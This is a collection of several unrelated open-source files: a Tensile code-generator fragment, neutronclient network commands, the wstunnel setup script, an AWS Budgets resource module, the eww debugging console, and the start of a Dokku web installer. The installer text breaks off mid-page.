typeName = dataTypes[0].toCpp()
h += " return solutions[solutionIdx]( static_cast<%s *>(deviceC), static_cast<%s *>(deviceA), static_cast<%s *>(deviceB),\n" \
% (typeName, typeName, typeName)
h += " alpha,\n"
if problemType["UseBeta"]:
h += " beta,\n"
h += " 0, 0, 0, // offsets\n"
for i in range(firstStride,lastStrideC):
h += " strideC%u%s,\n" % (i, indexChars[i])
for i in range(firstStride,lastStrideA):
h += " strideA%u%s,\n" % (i, \
indexChars[problemType["IndexAssignmentsA"][i]])
for i in range(firstStride,lastStrideB):
h += " strideB%u%s,\n" % (i, \
indexChars[problemType["IndexAssignmentsB"][i]])
for i in range(0, problemType["TotalIndices"]):
h += " size%s,\n" % indexChars[i]
h += " stream,\n"
if globalParameters["RuntimeLanguage"] == "OCL":
h += " numEvents, event_wait_list, outputEvent ); // events\n"
else:
h += " numEvents, startEvent, stopEvent); // events\n"
h += "};\n"
h += "\n"
else:
############################################################################
# Generated Call to Function
############################################################################
for enqueue in [True, False]:
functionName = "tensile" if enqueue else "tensileGetSolutionName"
returnName = "TensileStatus" if enqueue else "const char *"
h += "/* generated call to function */\n"
h += "template<typename DataType>\n"
h += "%s generatedCallTo_%s(\n" % (returnName, functionName)
h += " unsigned int *sizes,\n"
h += " DataType alpha,\n"
h += " DataType beta, \n"
h += " unsigned int numEvents = 0, \n"
if globalParameters["RuntimeLanguage"] == "OCL":
h += " cl_event *event_wait_list = NULL,\n"
h += " cl_event *outputEvent = NULL );\n\n"
else:
h += " hipEvent_t *startEvent = NULL,\n"
h += " hipEvent_t *stopEvent = NULL );\n\n"
for dataType in dataTypes:
typeName = dataType.toCpp()
functionsForDataType = []
for problemType in problemTypesForDataType[dataType]:
for scheduleName in schedulesForProblemType[problemType]:
functionsForDataType.append([scheduleName, problemType])
h += "template<>\n"
h += "inline %s generatedCallTo_%s<%s>(\n" \
% (returnName, functionName, typeName)
h += " unsigned int *sizes,\n"
h += " %s alpha,\n" % typeName
h += " %s beta,\n" % typeName
h += " unsigned int numEvents, \n"
if globalParameters["RuntimeLanguage"] == "OCL":
h += " cl_event *event_wait_list,\n"
h += " cl_event *outputEvent ) {\n\n"
else:
h += " hipEvent_t *startEvent,\n"
h += " hipEvent_t *stopEvent ) {\n\n"
h += " unsigned int functionIdxForDataType = functionInfo[functionIdx][4];\n"
for functionIdx in range(0, len(functionsForDataType)):
function = functionsForDataType[functionIdx]
scheduleName = function[0]
problemType = function[1]
if len(functionsForDataType)> 1:
if functionIdx == 0:
h += " if (functionIdxForDataType == %u) {\n" % functionIdx
elif functionIdx == len(functionsForDataType)-1:
h += " } else {\n"
else:
h += " } else if (functionIdxForDataType == %u) {\n" \
% functionIdx
# strides
indexChars = globalParameters["IndexChars"]
firstStride = 1
if problemType["UseInitialStrides"]:
firstStride = 0
lastStrideC = problemType["NumIndicesC"]
lastStrideA = len(problemType["IndexAssignmentsA"])
lastStrideB = len(problemType["IndexAssignmentsB"])
# calculate strides
for i in range(0,lastStrideC):
h += " unsigned int strideC%u%s = 1" % (i, indexChars[i])
for j in range(0, i):
h += "*sizes[%i]" % j
h += ";\n"
for i in range(0,lastStrideA):
h += " unsigned int strideA%u%s = 1" % (i, \
indexChars[problemType["IndexAssignmentsA"][i]])
for j in range(0, i):
h += "*sizes[%i]" % \
problemType["IndexAssignmentsA"][j]
h += ";\n"
for i in range(0,lastStrideB):
h += " unsigned int strideB%u%s = 1" % (i, \
indexChars[problemType["IndexAssignmentsB"][i]])
for j in range(0, i):
h += "*sizes[%i]" % \
problemType["IndexAssignmentsB"][j]
h += ";\n"
for i in range(0, problemType["TotalIndices"]):
h += " unsigned int size%s = sizes[%u];\n" % (indexChars[i], i)
# function call
h += " // call solution function\n"
h += " return %s_%s(\n" % (functionName, problemType)
if enqueue:
if globalParameters["RuntimeLanguage"] == "OCL":
h += " static_cast<cl_mem>(deviceC),\n"
h += " static_cast<cl_mem>(deviceA),\n"
h += " static_cast<cl_mem>(deviceB),\n"
else:
h += " static_cast<%s *>(deviceC),\n" % typeName
h += " static_cast<%s *>(deviceA),\n" % typeName
h += " static_cast<%s *>(deviceB),\n" % typeName
h += " alpha,\n"
if problemType["UseBeta"]:
h += " beta,\n"
h += " 0, 0, 0, // offsets\n"
for i in range(firstStride,lastStrideC):
h += " strideC%u%s,\n" % (i, indexChars[i])
for i in range(firstStride,lastStrideA):
h += " strideA%u%s,\n" % (i, \
indexChars[problemType["IndexAssignmentsA"][i]])
for i in range(firstStride,lastStrideB):
h += " strideB%u%s,\n" % (i, \
indexChars[problemType["IndexAssignmentsB"][i]])
for i in range(0, problemType["TotalIndices"]):
h += " size%s,\n" % indexChars[i]
h += " stream"
if enqueue:
if globalParameters["RuntimeLanguage"] == "OCL":
h += ",\n numEvents, event_wait_list, outputEvent"
else:
h += ",\n numEvents, startEvent, stopEvent"
h += ");\n"
if len(functionsForDataType) > 1:
h += " }\n" # close last if
h += "};\n" # close callToFunction
##############################################################################
# Results File Name
##############################################################################
if forBenchmark:
h += "/* results file name */\n"
resultsFileName = os.path.join(globalParameters["WorkingPath"], \
"../../Data","%s.csv" % stepName)
resultsFileName = resultsFileName.replace("\\", "\\\\")
h += "const char *resultsFileName = \"%s\";\n" % resultsFileName
##############################################################################
# Write File
##############################################################################
clientParametersFile = open(os.path.join(globalParameters["WorkingPath"], \
"ClientParameters.h"), "w")
clientParametersFile.write(CHeader)
clientParametersFile.write(h)
clientParametersFile.close()
|
mit
| 2,385,873,656,909,588,000
| 40.421791
| 152
| 0.550992
| false
| 3.774872
| false
| false
| false
|
eayunstack/python-neutronclient
|
neutronclient/neutron/v2_0/network.py
|
1
|
8760
|
# Copyright 2012 OpenStack Foundation.
# All Rights Reserved
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
import argparse
from neutronclient._i18n import _
from neutronclient.common import exceptions
from neutronclient.common import utils
from neutronclient.neutron import v2_0 as neutronV20
from neutronclient.neutron.v2_0 import availability_zone
from neutronclient.neutron.v2_0 import dns
from neutronclient.neutron.v2_0.qos import policy as qos_policy
def _format_subnets(network):
try:
return '\n'.join([' '.join([s['id'], s.get('cidr', '')])
for s in network['subnets']])
except (TypeError, KeyError):
return ''
class ListNetwork(neutronV20.ListCommand):
"""List networks that belong to a given tenant."""
# Length of a query filter on subnet id
# id=<uuid>& (with len(uuid)=36)
subnet_id_filter_len = 40
resource = 'network'
_formatters = {'subnets': _format_subnets, }
list_columns = ['id', 'name', 'subnets']
pagination_support = True
sorting_support = True
filter_attrs = [
'tenant_id',
'name',
'admin_state_up',
{'name': 'status',
'help': _("Filter %s according to their operation status."
"(For example: ACTIVE, ERROR etc)"),
'boolean': False,
'argparse_kwargs': {'type': utils.convert_to_uppercase}},
{'name': 'shared',
'help': _('Filter and list the networks which are shared.'),
'boolean': True},
{'name': 'router:external',
'help': _('Filter and list the networks which are external.'),
'boolean': True},
{'name': 'tags',
'help': _("Filter and list %s which has all given tags. "
"Multiple tags can be set like --tags <tag[,tag...]>"),
'boolean': False,
'argparse_kwargs': {'metavar': 'TAG'}},
{'name': 'tags_any',
'help': _("Filter and list %s which has any given tags. "
"Multiple tags can be set like --tags-any <tag[,tag...]>"),
'boolean': False,
'argparse_kwargs': {'metavar': 'TAG'}},
{'name': 'not_tags',
'help': _("Filter and list %s which does not have all given tags. "
"Multiple tags can be set like --not-tags <tag[,tag...]>"),
'boolean': False,
'argparse_kwargs': {'metavar': 'TAG'}},
{'name': 'not_tags_any',
'help': _("Filter and list %s which does not have any given tags. "
"Multiple tags can be set like --not-tags-any "
"<tag[,tag...]>"),
'boolean': False,
'argparse_kwargs': {'metavar': 'TAG'}},
]
def extend_list(self, data, parsed_args):
"""Add subnet information to a network list."""
neutron_client = self.get_client()
search_opts = {'fields': ['id', 'cidr']}
if self.pagination_support:
page_size = parsed_args.page_size
if page_size:
search_opts.update({'limit': page_size})
subnet_ids = []
for n in data:
if 'subnets' in n:
subnet_ids.extend(n['subnets'])
def _get_subnet_list(sub_ids):
search_opts['id'] = sub_ids
return neutron_client.list_subnets(
**search_opts).get('subnets', [])
try:
subnets = _get_subnet_list(subnet_ids)
except exceptions.RequestURITooLong as uri_len_exc:
# The URI is too long because of too many subnet_id filters
# Use the excess attribute of the exception to know how many
# subnet_id filters can be inserted into a single request
subnet_count = len(subnet_ids)
max_size = ((self.subnet_id_filter_len * subnet_count) -
uri_len_exc.excess)
chunk_size = max_size // self.subnet_id_filter_len
subnets = []
for i in range(0, subnet_count, chunk_size):
subnets.extend(
_get_subnet_list(subnet_ids[i: i + chunk_size]))
subnet_dict = dict([(s['id'], s) for s in subnets])
for n in data:
if 'subnets' in n:
n['subnets'] = [(subnet_dict.get(s) or {"id": s})
for s in n['subnets']]
class ListExternalNetwork(ListNetwork):
"""List external networks that belong to a given tenant."""
pagination_support = True
sorting_support = True
def retrieve_list(self, parsed_args):
external = '--router:external=True'
if external not in self.values_specs:
self.values_specs.append('--router:external=True')
return super(ListExternalNetwork, self).retrieve_list(parsed_args)
class ShowNetwork(neutronV20.ShowCommand):
"""Show information of a given network."""
resource = 'network'
class CreateNetwork(neutronV20.CreateCommand, qos_policy.CreateQosPolicyMixin):
"""Create a network for a given tenant."""
resource = 'network'
def add_known_arguments(self, parser):
parser.add_argument(
'--admin-state-down',
dest='admin_state', action='store_false',
help=_('Set admin state up to false.'))
parser.add_argument(
'--admin_state_down',
dest='admin_state', action='store_false',
help=argparse.SUPPRESS)
parser.add_argument(
'--shared',
action='store_true',
help=_('Set the network as shared.'),
default=argparse.SUPPRESS)
parser.add_argument(
'--provider:network_type',
metavar='<network_type>',
help=_('The physical mechanism by which the virtual network'
' is implemented.'))
parser.add_argument(
'--provider:physical_network',
metavar='<physical_network_name>',
help=_('Name of the physical network over which the virtual '
'network is implemented.'))
parser.add_argument(
'--provider:segmentation_id',
metavar='<segmentation_id>',
help=_('VLAN ID for VLAN networks or tunnel-id for GRE/VXLAN '
'networks.'))
utils.add_boolean_argument(
parser,
'--vlan-transparent',
default=argparse.SUPPRESS,
help=_('Create a VLAN transparent network.'))
parser.add_argument(
'name', metavar='NAME',
help=_('Name of the network to be created.'))
parser.add_argument(
'--description',
help=_('Description of network.'))
self.add_arguments_qos_policy(parser)
availability_zone.add_az_hint_argument(parser, self.resource)
dns.add_dns_argument_create(parser, self.resource, 'domain')
def args2body(self, parsed_args):
body = {'name': parsed_args.name,
'admin_state_up': parsed_args.admin_state}
neutronV20.update_dict(parsed_args, body,
['shared', 'tenant_id',
'vlan_transparent',
'provider:network_type',
'provider:physical_network',
'provider:segmentation_id',
'description'])
self.args2body_qos_policy(parsed_args, body)
availability_zone.args2body_az_hint(parsed_args, body)
dns.args2body_dns_create(parsed_args, body, 'domain')
return {'network': body}
class DeleteNetwork(neutronV20.DeleteCommand):
"""Delete a given network."""
resource = 'network'
class UpdateNetwork(neutronV20.UpdateCommand, qos_policy.UpdateQosPolicyMixin):
"""Update network's information."""
resource = 'network'
def add_known_arguments(self, parser):
self.add_arguments_qos_policy(parser)
dns.add_dns_argument_update(parser, self.resource, 'domain')
def args2body(self, parsed_args):
body = {}
self.args2body_qos_policy(parsed_args, body)
dns.args2body_dns_update(parsed_args, body, 'domain')
return {'network': body}
|
apache-2.0
| 5,446,808,212,747,097,000
| 36.758621
| 79
| 0.573973
| false
| 4.231884
| false
| false
| false
|
ffalcinelli/wstunnel
|
setup.py
|
1
|
4807
|
#!/bin/env python
# -*- coding: utf-8 -*-
# Copyright (C) 2013 Fabio Falcinelli
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import sys
from setuptools import setup, find_packages
import wstunnel
__author__ = 'fabio'
kwargs = dict(name='wstunnel',
version='0.0.6',
description='A Python WebSocket Tunnel',
author='Fabio Falcinelli',
author_email='fabio.falcinelli@gmail.com',
url='https://github.com/ffalcinelli/wstunnel',
keywords=['tunneling', 'websocket', 'ssl'],
packages=find_packages(),
classifiers=[
'Development Status :: 2 - Pre-Alpha',
'Intended Audience :: Developers',
'Intended Audience :: System Administrators',
'Intended Audience :: Telecommunications Industry',
'License :: OSI Approved :: GNU Lesser General Public License v3 or later (LGPLv3+)',
'Programming Language :: Python',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3.3',
'Programming Language :: Python :: 3.4',
'Topic :: Software Development :: Libraries :: Python Modules',
'Topic :: Utilities',
],
setup_requires=['nose'],
test_suite='nose.collector')
kwargs["download_url"] = 'https://github.com/ffalcinelli/wstunnel/tarball/{0}'.format(kwargs.get("version"))
install_requires = ["PyYAML>=3.10",
"tornado>=3.0.2",
"nose>=1.3.0",
"mock>=1.0.1"]
if not sys.platform.startswith("win"):
kwargs["install_requires"] = install_requires
kwargs["entry_points"] = {
"console_scripts": [
"wstuncltd = wstunnel.daemon.wstuncltd:main",
"wstunsrvd = wstunnel.daemon.wstunsrvd:main",
]
}
else:
install_requires.extend(["pywin32>=218",
"py2exe>=0.6.9", ])
if "py2exe" in sys.argv:
if wstunnel.PY2:
from wstunnel.svc import wstunsrvd, wstuncltd
import py2exe
class Target:
def __init__(self, **kw):
self.__dict__.update(kw)
# for the versioninfo resources
self.version = kwargs["version"]
self.company_name = "N.A."
self.copyright = "Copyright (c) 2014 Fabio Falcinelli"
self.name = kwargs["name"]
tunclt_svc = Target(
# used for the versioninfo resource
description=wstuncltd.wstuncltd._svc_description_,
# what to build. For a service, the module name (not the
# filename) must be specified!
modules=["wstunnel.svc.wstuncltd"],
cmdline_style='pywin32',
)
tunsrv_svc = Target(
# used for the versioninfo resource
description=wstunsrvd.wstunsrvd._svc_description_,
# what to build. For a service, the module name (not the
# filename) must be specified!
modules=["wstunnel.svc.wstunsrvd"],
cmdline_style='pywin32',
)
kwargs["service"] = [tunclt_svc, tunsrv_svc]
kwargs["options"] = {
"py2exe": {
"compressed": 1,
"optimize": 2,
}
}
else:
sys.stderr.write("Warning: you're using python {0}.{1}.{2} "
"which is not supported yet by py2exe.\n".format(sys.version_info[0],
sys.version_info[1],
sys.version_info[2]))
sys.exit(-1)
else:
kwargs["entry_points"] = {
"console_scripts": [
"wstuncltd = wstunnel.svc.wstuncltd:main",
"wstunsrvd = wstunnel.svc.wstunsrvd:main",
]
}
setup(**kwargs)
|
lgpl-3.0
| 5,581,825,389,117,905,000
| 38.735537
| 108
| 0.524027
| false
| 4.176368
| false
| false
| false
|
garyd203/flying-circus
|
src/flyingcircus/_raw/budgets.py
|
1
|
1096
|
"""Raw representations of every data type in the AWS Budgets service.
See Also:
`AWS developer guide for Budgets
<https://docs.aws.amazon.com/awsaccountbilling/latest/aboutv2/>`_
This file is automatically generated, and should not be directly edited.
"""
from attr import attrib
from attr import attrs
from ..core import ATTRSCONFIG
from ..core import Resource
from ..core import ResourceProperties
from ..core import create_object_converter
__all__ = ["Budget", "BudgetProperties"]
@attrs(**ATTRSCONFIG)
class BudgetProperties(ResourceProperties):
Budget = attrib(default=None)
NotificationsWithSubscribers = attrib(default=None)
@attrs(**ATTRSCONFIG)
class Budget(Resource):
"""A Budget for Budgets.
See Also:
`AWS Cloud Formation documentation for Budget
<http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-budgets-budget.html>`_
"""
RESOURCE_TYPE = "AWS::Budgets::Budget"
Properties: BudgetProperties = attrib(
factory=BudgetProperties, converter=create_object_converter(BudgetProperties)
)
|
lgpl-3.0
| -4,699,627,189,435,388,000
| 26.4
| 106
| 0.737226
| false
| 3.665552
| false
| false
| false
|
py-eww/eww
|
eww/command.py
|
1
|
15282
|
# -*- coding: utf-8 -*-
"""
eww.command
~~~~~~~~~~~
This is our custom command module. It is a subclass of
:py:class:`cmd.Cmd`. The most significant change is using classes rather
than functions for the commands.
Due to this change, we don't use CamelCase for command class names here.
Strictly that's ok via PEP8 since we are kinda treating these like
callables. Just a heads up.
"""
# PyLint picks up a lot of things here that it shouldn't. We clean up here.
# pylint: disable=too-few-public-methods, no-self-use, invalid-name
# pylint: disable=too-many-public-methods, redefined-outer-name
# pylint: disable=maybe-no-member, no-member, star-args, bad-builtin
import cmd
import code
import logging
from math import ceil
import os
import shlex
from StringIO import StringIO
import sys
import __builtin__
try:
import pygal
except ImportError: # pragma: no cover
# Just in case pygal isn't installed
pass
from .parser import Parser, ParserError, Opt
from .quitterproxy import safe_quit
from .shared import COUNTER_STORE, GRAPH_STORE
LOGGER = logging.getLogger(__name__)
class Command(cmd.Cmd):
"""Our cmd subclass where we implement all console functionality."""
class BaseCmd(object):
"""The base class for all commands."""
# You should define the following properties on all subclasses
name = 'Undefined'
description = 'Undefined'
usage = 'Undefined'
options = []
def run(self, line):
"""Performs the requested command. You should definitely override
this.
Args:
line (str): A command line argument to be parsed.
Returns:
bool: True to exit, None otherwise.
"""
pass
class EOF_command(BaseCmd):
"""Implements support for EOF being interpreted as an exit request."""
name = 'EOF'
description = 'An EOF will trigger this command and exit the console.'
usage = 'N/A'
def run(self, line):
"""Returns True to trigger an exit.
Args:
line (str): A command line argument to be parsed.
Returns:
bool: True
"""
return True
class exit_command(BaseCmd):
"""Implements support for the 'exit' command to leave the console."""
name = 'exit'
description = 'Exits the console. (same as quit)'
usage = 'exit'
def run(self, line):
"""Returns True to trigger an exit.
Args:
line (str): A command line argument to be parsed.
Returns:
bool: True
"""
return True
class quit_command(BaseCmd):
"""Implements support for the 'quit' command to leave the console."""
name = 'quit'
description = 'Quits the console. (same as exit)'
usage = 'quit'
def run(self, line):
"""Returns True to trigger an exit.
Args:
line (str): A command line argument to be parsed.
Returns:
bool: True
"""
return True
class repl_command(BaseCmd):
"""Drops the user into a python REPL."""
name = 'repl'
description = 'Provides an interactive REPL.'
usage = 'repl'
def register_quit(self):
"""Registers our custom quit function to prevent stdin from being
closed.
Returns:
None
"""
__builtin__.quit.register(safe_quit)
__builtin__.exit.register(safe_quit)
def unregister_quit(self):
"""Unregisters our custom quit function.
Returns:
None
"""
__builtin__.quit.unregister()
__builtin__.exit.unregister()
def run(self, line):
"""Implements the repl.
Args:
line (str): A command line argument to be parsed.
Returns:
None
"""
print 'Dropping to REPL...'
repl = code.InteractiveConsole()
try:
self.register_quit()
banner = 'Python ' + sys.version + ' on ' + sys.platform + '\n'
banner += 'Note: This interpreter is running *inside* of your '
banner += 'application. Be careful.'
repl.interact(banner)
except SystemExit:
# This catches the exit or quit from the REPL.
pass
finally:
self.unregister_quit()
print "Exiting REPL..."
class stats_command(BaseCmd):
"""A command for inspecting stats and generating graphs."""
name = 'stats'
description = 'Outputs recorded stats and generates graphs.'
usage = 'stats [args] [stat_name]'
# Declare options
options = []
options.append(Opt('-g', '--graph',
dest='graph',
default=False,
action='store_true',
help='Create graph'))
options.append(Opt('-f', '--file',
dest='file',
default=False,
action='store',
type='string',
help='Filename to use when saving graph'))
options.append(Opt('-t', '--title',
dest='title',
default=False,
action='store',
type='string',
help='Graph title'))
def __init__(self):
"""Init."""
super(Command.stats_command, self).__init__()
self.parser = Parser()
self.parser.add_options(self.options)
# Pygal won't support more than this currently
self.max_points = 30
def display_stat_summary(self):
"""Prints a summary of collected stats.
Returns:
None
"""
if not COUNTER_STORE and not GRAPH_STORE:
print "No stats recorded."
return
if COUNTER_STORE:
print "Counters:"
for stat in COUNTER_STORE:
print " ", stat + ':' + str(COUNTER_STORE[stat])
if GRAPH_STORE:
print "Graphs:"
for stat in GRAPH_STORE:
print " ", stat + ':' + str(len(GRAPH_STORE[stat]))
def display_single_stat(self, stat_name):
"""Prints a specific stat.
Args:
stat_name (str): The stat name to display details of.
Returns:
None
"""
if stat_name in COUNTER_STORE:
print COUNTER_STORE[stat_name]
return
if stat_name in GRAPH_STORE:
print list(GRAPH_STORE[stat_name])
return
else:
print 'No stat recorded with that name.'
def reduce_data(self, data):
"""Shrinks len(data) to ``self.max_points``.
Args:
data (iterable): An iterable greater than ``self.max_points``.
Returns:
list: A list with a fair sampling of objects from ``data``,
and a length of ``self.max_points.``
"""
# Thanks to Adam Forsyth for this implementation
shrunk = []
size = float(len(data))
for num in range(self.max_points):
shrunk.append(data[int(ceil(num * size / self.max_points))])
return shrunk
def generate_graph(self, options, stat_name):
"""Generate a graph of ``stat_name``.
Args:
options (dict): A dictionary of option values generated from
our parser.
stat_name (str): A graph name to create a graph from.
Returns:
None
"""
if stat_name not in GRAPH_STORE:
print 'No graph records exist for name', stat_name
return
if 'pygal' not in sys.modules: # pragma: no cover
print 'Pygal library unavailable. Try running `pip install',
print 'pygal`.'
return
data = list(GRAPH_STORE[stat_name])
graph = pygal.Line()
if options['title']:
graph.title = options['title']
else:
graph.title = stat_name
if len(data) > self.max_points:
data = self.reduce_data(data)
x_labels, y_labels = zip(*data)
graph.x_labels = map(str, x_labels)
graph.add(stat_name, y_labels)
graph_svg = graph.render()
filename = options['file'] or stat_name
filename += '.svg'
try:
with open(filename, 'w') as svg_file:
svg_file.write(graph_svg)
print 'Chart written to', filename # pragma: no cover
except IOError:
print 'Unable to write to', os.getcwd() + '/' + filename
def run(self, line):
"""Outputs recorded stats and generates graphs.
Args:
line (str): A command line argument to be parsed.
Returns:
None
"""
if not line:
self.display_stat_summary()
return
try:
options, remainder = self.parser.parse_args(shlex.split(line))
except ParserError as error_msg:
print error_msg
return
options = vars(options)
if not remainder:
# User entered something goofy
help_cmd = Command.help_command()
help_cmd.display_command_detail('stats')
return
if options['graph']:
self.generate_graph(options, remainder[0])
return
else:
self.display_single_stat(remainder[0])
return
class help_command(BaseCmd):
"""When called with no arguments, this presents a friendly help page.
When called with an argument, it presents command specific help.
"""
name = 'help'
description = 'help provides in-console documentation.'
usage = 'help [command]'
# Declare options
options = []
def __init__(self):
"""Init."""
super(Command.help_command, self).__init__()
self.parser = Parser()
self.parser.add_options(self.options)
def get_commands(self):
"""Returns a list of command classes.
Returns:
list: A list of command classes (not instantiated).
"""
commands = []
blacklist = ['EOF_command']
# First we get a list of all command names
all_names = dir(Command)
# Then find on-topic names
for name in all_names:
if name.endswith('_command') and name not in blacklist:
# Pull names and descriptions
cls = getattr(Command, name)
commands.append(cls)
return commands
def display_commands(self):
"""Displays all included commands.
Returns:
None
"""
commands = self.get_commands()
print 'Available Commands:'
print ''
for command in commands:
print ' ', command.name, '-', command.description
print ''
print 'For more info on a specific command, enter "help <command>"'
def display_command_detail(self, command_name):
"""Displays detailed command help.
Args:
command_name (str): A command name to print detailed help for.
Returns:
None
"""
name = command_name + '_command'
try:
cls = getattr(Command, name)
except AttributeError:
print command_name, 'is not a valid command.'
return
print 'Usage:'
print ' ', cls.usage
print ''
print 'Description:'
print ' ', cls.description
if not cls.options:
# All done
return
else:
print ''
# There are a lot of edge cases around pretty printing options.
# This is not elegant, but it's the least brittle option.
output = StringIO()
parser = Parser()
parser.add_options(cls.options)
parser.print_help(file=output)
output = output.getvalue()
# Massage output
output = output.split('\n')
# Remove trailing newline
output = output[:-1]
# Print everything after Options
start = output.index('Options:')
for line in output[start:]:
print line
def run(self, line):
"""Provides help documentation.
Args:
line (str): A command line argument to be parsed.
Returns:
None
"""
if not line:
self.display_commands()
return
try:
options, remainder = self.parser.parse_args(shlex.split(line))
del options # To shutup pylint
except ParserError as error_msg:
print error_msg
return
self.display_command_detail(remainder[0])
def onecmd(self, line):
"""We override cmd.Cmd.onecmd in order to support our class-based
commands. Changes are noted via comments.
Args:
line (str): A command (with arguments) to be executed.
Returns:
bool: True if a command is designed to exit, otherwise None.
"""
cmd, arg, line = self.parseline(line)
if not line:
return self.emptyline()
if cmd is None:
return self.default(line)
self.lastcmd = line
if line == 'EOF':
self.lastcmd = ''
if cmd == '':
return self.default(line)
else:
try:
# Changes start
cmd_class = getattr(Command, cmd + '_command')
cmd_class = cmd_class()
# Changes end
except AttributeError:
return self.default(line)
# Changes start
return cmd_class.run(arg)
# Changes end
def default(self, line):
"""The first responder when a command is unrecognized."""
print 'Command unrecognized.'
|
mit
| 357,748,505,772,380,400
| 28.501931
| 79
| 0.499018
| false
| 4.936047
| false
| false
| false
|
alessio/dokku
|
contrib/dokku-installer.py
|
1
|
7718
|
#!/usr/bin/env python2.7
import cgi
import json
import os
import SimpleHTTPServer
import SocketServer
import subprocess
import sys
import threading
VERSION = 'v0.4.11'
hostname = ''
try:
command = "bash -c '[[ $(dig +short $HOSTNAME) ]] && echo $HOSTNAME || wget -q -O - icanhazip.com'"
hostname = subprocess.check_output(command, shell=True)
if ':' in hostname:
hostname = ''
except subprocess.CalledProcessError:
pass
key_file = os.getenv('KEY_FILE', '/root/.ssh/authorized_keys')
admin_keys = []
if os.path.isfile(key_file):
try:
command = "cat {0}".format(key_file)
admin_keys = subprocess.check_output(command, shell=True).strip().split("\n")
except subprocess.CalledProcessError:
pass
def check_boot():
if 'onboot' not in sys.argv:
return
init_dir = os.getenv('INIT_DIR', '/etc/init')
systemd_dir = os.getenv('SYSTEMD_DIR', '/etc/systemd/system')
nginx_dir = os.getenv('NGINX_DIR', '/etc/nginx/conf.d')
if os.path.exists(init_dir):
with open('{0}/dokku-installer.conf'.format(init_dir), 'w') as f:
f.write("start on runlevel [2345]\n")
f.write("exec {0} selfdestruct\n".format(os.path.abspath(__file__)))
if os.path.exists(systemd_dir):
with open('{0}/dokku-installer.service'.format(systemd_dir), 'w') as f:
f.write("[Unit]\n")
f.write("Description=Dokku web-installer\n")
f.write("\n")
f.write("[Service]\n")
f.write("ExecStart={0} selfdestruct\n".format(os.path.abspath(__file__)))
f.write("\n")
f.write("[Install]\n")
f.write("WantedBy=multi-user.target\n")
f.write("WantedBy=graphical.target\n")
if os.path.exists(nginx_dir):
with open('{0}/dokku-installer.conf'.format(nginx_dir), 'w') as f:
f.write("upstream dokku-installer { server 127.0.0.1:2000; }\n")
f.write("server {\n")
f.write(" listen 80;\n")
f.write(" location / {\n")
f.write(" proxy_pass http://dokku-installer;\n")
f.write(" }\n")
f.write("}\n")
subprocess.call('rm -f /etc/nginx/sites-enabled/*', shell=True)
sys.exit(0)
class GetHandler(SimpleHTTPServer.SimpleHTTPRequestHandler):
def do_GET(self):
content = PAGE.replace('{VERSION}', VERSION)
content = content.replace('{HOSTNAME}', hostname)
content = content.replace('{ADMIN_KEYS}', "\n".join(admin_keys))
self.send_response(200)
self.end_headers()
self.wfile.write(content)
def do_POST(self):
if self.path not in ['/setup', '/setup/']:
return
params = cgi.FieldStorage(fp=self.rfile,
headers=self.headers,
environ={
'REQUEST_METHOD': 'POST',
'CONTENT_TYPE': self.headers['Content-Type']})
dokku_root = os.getenv('DOKKU_ROOT', '/home/dokku')
if 'vhost' in params and params['vhost'].value == 'true':
with open('{0}/VHOST'.format(dokku_root), 'w') as f:
f.write(params['hostname'].value)
else:
try:
os.remove('{0}/VHOST'.format(dokku_root))
except OSError:
pass
with open('{0}/HOSTNAME'.format(dokku_root), 'w') as f:
f.write(params['hostname'].value)
command = ['sshcommand', 'acl-add', 'dokku', 'admin']
for key in params['keys'].value.split("\n"):
proc = subprocess.Popen(command, stdin=subprocess.PIPE)
proc.stdin.write(key)
proc.stdin.close()
proc.wait()
if 'selfdestruct' in sys.argv:
DeleteInstallerThread()
self.send_response(200)
self.end_headers()
self.wfile.write(json.dumps({'status': 'ok'}))
class DeleteInstallerThread(object):
def __init__(self, interval=1):
thread = threading.Thread(target=self.run, args=())
thread.daemon = True
thread.start()
def run(self):
command = "rm /etc/nginx/conf.d/dokku-installer.conf && /etc/init.d/nginx stop && /etc/init.d/nginx start"
try:
subprocess.call(command, shell=True)
except:
pass
command = "rm -f /etc/init/dokku-installer.conf /etc/systemd/system/dokku-installer.service && stop dokku-installer"
try:
subprocess.call(command, shell=True)
except:
pass
def main():
check_boot()
port = int(os.getenv('PORT', 2000))
httpd = SocketServer.TCPServer(("", port), GetHandler)
print "Listening on 0.0.0.0:{0}, CTRL+C to stop".format(port)
httpd.serve_forever()
PAGE = """
<html>
<head>
<title>Dokku Setup</title>
<link rel="stylesheet" href="//netdna.bootstrapcdn.com/bootstrap/3.0.0/css/bootstrap.min.css" />
<script src="//ajax.googleapis.com/ajax/libs/jquery/1.10.2/jquery.min.js"></script>
</head>
<body>
<div class="container" style="width: 640px;">
<form id="form" role="form">
<h1>Dokku Setup <small>{VERSION}</small></h1>
<div class="form-group">
<h3><small style="text-transform: uppercase;">Admin Access</small></h3>
<label for="key">Public Key</label><br />
<textarea class="form-control" name="keys" rows="7" id="key">{ADMIN_KEYS}</textarea>
</div>
<div class="form-group">
<h3><small style="text-transform: uppercase;">Hostname Configuration</small></h3>
<div class="form-group">
<label for="hostname">Hostname</label>
<input class="form-control" type="text" id="hostname" name="hostname" value="{HOSTNAME}" />
</div>
<div class="checkbox">
<label><input id="vhost" name="vhost" type="checkbox" value="true"> Use <abbr title="Nginx will be run on port 80 and backend to your apps based on hostname">virtualhost naming</abbr> for apps</label>
</div>
<p>Your app URLs will look like:</p>
<pre id="example">http://hostname:port</pre>
</div>
<button type="button" onclick="setup()" class="btn btn-primary">Finish Setup</button> <span style="padding-left: 20px;" id="result"></span>
</form>
</div>
<div id="error-output"></div>
<script>
function setup() {
